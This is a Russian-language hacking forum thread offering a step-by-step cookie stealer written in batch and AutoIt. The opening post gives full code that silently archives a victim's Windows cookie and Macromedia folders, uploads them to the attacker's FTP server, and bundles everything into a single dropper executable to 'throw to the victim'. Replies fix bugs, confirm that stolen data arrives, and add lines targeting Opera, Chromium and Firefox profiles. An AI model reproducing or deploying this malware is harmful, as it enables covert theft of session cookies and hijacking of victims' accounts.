[Статья] Тырим кукисы и загружаем их по ФТП

Предыдущие сообщения
20 августа 2012
#1 DialMax uid#563 Доброго времени суток!
Хочу показать как можно тырить куки спомощью Autoit

Этот вирь собирается из компонентов, а точнее из 3 файлов: nstconnect.bat, ftpconnect.au3, Rar.exe

Код nstconnect.bat:
@echo off
Rar a -p[pass] %SystemRoot%\nstxc.rar %UserProfile%\AppData\Roaming\Microsoft\Windows\Cookies\*.* >nul
Rar a -p[pass] %SystemRoot%\nstxc.rar %UserProfile%\AppData\Roaming\Macromedia >nul
Start ftpconnect.exe >nul
exit
Этот файл мы компилируем с помощью программы Bat_To_Exe_Converter.exe (ищите в гугле), в настройках видимости ставите галочку "Невидимое приложение", ну а дальше подстраивайте под себя! только файл должен иметь имя nstconnect.exe

Код ftpconnect.au3
#include <FTPEx.au3>
Opt("TrayIconHide", 1)
global      $sServer = "ФТП Хост", _ ;ftp host
              $sUsername = "имя пользователя", _ ;Ftp user
              $sPass = "пароль", _ ;Ftp password
              $sFileLocal = @WindowsDir & '\nstxc.rar', _ ;C:\Windows\nstxc.rar
              $sFileFTP = 'cookies.rar', _
              $hOpen = _FTP_Open('MyFTP Control')
              $hConn = _FTP_Connect($hOpen, $sServer, $sUsername, $sPass, 1)
              _FTP_FilePut($hConn, $sFileLocal, $sFileFTP)
              Sleep(5000)
              _FTP_Close($hOpen)
компилируете файл ftpconnect.au3

Программа rar.exe находится в папке с винраром
Кидаете всё в одну папку, и создаёте файл

имяфайла.au3
код:
Opt("TrayIconHide", 1)
_Install()
Func _Install()
      FileInstall("ftpconnect.exe", @SystemDir & "\ftpconnect.exe")
      FileInstall("nstconnect.exe", @SystemDir & "\nstconnect.exe")
      FileInstall("Rar.exe", @SystemDir & "\Rar.exe")
      Run(@SystemDir & "\nstconnect.exe")
EndFunc
компилируете и этот файл, теперь у вас всё в одном файле имяфайла.exe, смело кидайте его жертве!
Внимание пароль - [pass]
01:32:29 12
#2 MyP3uk uid#1395 Молодец! Статья замечательная! + 01:38:13 1
#3 zeekO uid#3231 При компиляции ftpconnect.au3 выдаёт ошибку
07:05:04 0
#4 MyP3uk uid#1395 А программу завершил? 07:29:03 0
#5 zeekO uid#3231 Я так понял нужно:
nstconnect.bat в nstconnect.exe
ftpconnect.au3 в ftpconnect.exe
и rar.exe ; потом всё это склеить в 1 файл
08:01:43 0
#6 DialMax uid#563 да 12:02:17 2
#7 DialMax uid#563 Извеняюсь, перед строкой $sServer = "ФТП Хост", _ ;ftp host
поставте global, чтобы получилось:
global $sServer = "ФТП Хост", _ ;ftp host
12:27:07 2
#8 DialMax uid#563 теперь файл ftpconnect.au3 должен компилироватся. 12:34:46 2
#9 DialMax uid#563 MyP3uk, завершил. 12:39:08 1
21 августа 2012
#10 bg uid#1774
компилируете файл ftpconnect.au3
При компилировании, у меня ошибку не выдает, но и действия я не вижу (!

P.S Может в определенную папку кидает созданный файл?
18:26:42 2
#11 virtuoso uid#1428 Извиняюсь за такой вопрос. Но я хотел бы уточнить. Это файл кидаю жертве если она его запустит то все куки придут мне на FTP ? 21:22:21 0
#12 DialMax uid#563 да 21:34:32 2
#13 DialMax uid#563 bg, а ты учёл мою поправку? 21:35:38 0
#14сообщение удалено
#15 MyP3uk uid#1395
bg, а ты учёл мою поправку?
Макс, дабл клик по своей статье и измени её (добавь поправки), ибо тема со временем забьётся одинаковыми вопросами.
10:19:57 1
#16 bg uid#1774
bg, а ты учёл мою поправку?
Да, если ты насчет global $sServer = "ФТП Хост", _ ;ftp host
14:21:30 2
#17 DialMax uid#563 и что ещё ошибку выдаёт? 15:55:06 0
#18 bg uid#1774
и что ещё ошибку выдаёт?
Ошибку не выдает, но и действия нет(!

P.S Как я понимаю, должна появиться ftpconnect.exe файл, после компиляции, но ничего подобного я не вижу..(!
16:13:50 1
#19 DialMax uid#563 экзешника нету? 17:06:40 0
#20 bg uid#1774
экзешника нету?
Что это?
17:14:40 1
#21 bg uid#1774 exe компилятор имеешь ввиду? 17:15:06 2
#22 DialMax uid#563 не, фтпконекта.ау3 17:24:10 0
#23 DialMax uid#563 ой, фтпконнект.ехе 17:24:56 0
#24 bg uid#1774 так я чет совсем запутался и слова твоего понять не могу (#22;23)

файл ftpconnect.au3 создал, после открыл autoit, выбрал файл ftpconnect.au3 и все далее он должен мне скомпилировать exe файл?! если да, то яухин не создал (!

P.S Модет не так понял, запутался, то там, то тут !)
17:34:29 2
#25 bg uid#1774 sorry, я не правильно компилировал, точнее я не компилировал, насколько я понял, то я просто открывал типо предварительный предпросмотр, а сейчас в расположении файла нашел компилятор.. ЫЫЫЫЫЫЫЫЫЫЫ, как то даже глупо, но итог для меня важнее.

На ошибках учатся
17:48:42 1
#26 DialMax uid#563 bg, ты проверял работоспособность программы? 19:58:12 0
#27 bg uid#1774
bg, ты проверял работоспособность программы?
Забыл отправить пост и перезагрузил систему Насчет раотоспособности, да все он отправил, но только, когда я pfuhepbk архив с ftp? он требует пароль :? какой? от ftp не походит, от системы нет!
20:56:28 2
#28 DialMax uid#563 я забыл сказать, пароль: pass 21:24:49 0
#29 bg uid#1774
я забыл сказать, пароль: pass
никуя :(
22:03:18 2
#30 DialMax uid#563 Что, не подходит? 22:06:01 0
#31 bg uid#1774
Что, не подходит?
нет, ни pass; Pass; PASS; passwd; pwd; PASSWD; Pasword; PASSWORD; password; (!
22:13:44 2
#32 DialMax uid#563 попробуй: [pass] (в скобках) 22:37:59 1
#33 bg uid#1774
попробуй: [pass] (в скобках)
Действует! Все, теперь полностью доволен;)
22:46:41 1
#34 DialMax uid#563 надо отредактировать тему, жаль что с телефона этого нельзя!... 22:49:09 0
#35 bg uid#1774
надо отредактировать тему, жаль что с телефона этого нельзя!...
Мурзик модератор, в его силах, попроси его)

Пароль к архиву, которая сливается на ftp - [pass] , со скобками вместе
23:00:00 2
#36 DialMax uid#563 та я сам как нибудь сделаю 23:02:00 0
#37 Gosha123 uid#5429 а что прописывать для кражи кук из браузеров? 11:43:10 0
#38 Gosha123 uid#5429 прописал
Rar a -p[pass] %SystemRoot%\nstxc.rar %UserProfile%\AppData\Local\Opera\Opera\cache >nul
Rar a -p[pass] %SystemRoot%\nstxc.rar %UserProfile%\AppData\Local\Chromium\User Data\Default\Cache >nul
Rar a -p[pass] %SystemRoot%\nstxc.rar %UserProfile%\AppData\Roaming\Mozilla\Firefox\Profiles >nul
но ничего не пришло (у меня стоит мозила)
11:45:26 0
Следующие сообщения
*Ник: Проверка уникальности... Если вы уже зарегистрированы, авторизуйтесь.
*Сообщение:
  Загрузка...